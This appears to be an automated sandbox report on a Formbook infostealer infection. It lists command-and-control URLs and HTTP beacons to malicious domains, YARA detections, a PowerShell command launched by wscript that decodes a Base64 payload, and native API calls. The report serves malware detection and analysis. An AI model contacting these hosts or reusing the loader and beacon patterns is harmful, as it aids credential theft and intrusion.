          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.com/g94s/www.xnmshx.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.styledinfaith.comReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfd/g94s/www.93txm.live
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xnmshx.cfdReferer:
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd/g94s/
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfd/g94s/www.lojq5vh.buzz
          Source: explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yprblqkk.cfdReferer:
          Source: unknown DNS traffic detected: queries for: freswe.click
          Source: C:\Windows\explorer.exe Code function: 4_2_07554F82 getaddrinfo,setsockopt,recv, 4_2_07554F82
          Source: global traffic HTTP traffic detected: GET /v/sino.txt HTTP/1.1 Host: freswe.click Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd HTTP/1.1 Host: www.apinspect.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe HTTP/1.1 Host: www.baroevent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ HTTP/1.1 Host: www.hyperpigmentation-91528.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd HTTP/1.1 Host: www.qsmdrkjw.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy HTTP/1.1 Host: www.lajzznhk.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          Source: Yara match File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: powershell.exe PID: 5468, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 5912, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 27014
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.906043086.000000000756C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: powershell.exe PID: 5468, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 5912, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03A2B150 appears 48 times
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0455B150 appears 35 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A350 NtCreateFile,3_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A400 NtReadFile,3_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A480 NtClose,3_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A530 NtAllocateVirtualMemory,3_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A34A NtCreateFile,3_2_0041A34A
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A3FA NtReadFile,3_2_0041A3FA
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041A47D NtClose,3_2_0041A47D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69A20 NtResumeThread,LdrInitializeThunk,3_2_03A69A20
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_03A69A00
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_03A69A50 NtCreateFile,LdrInitializeThunk,3_2_03A69A50
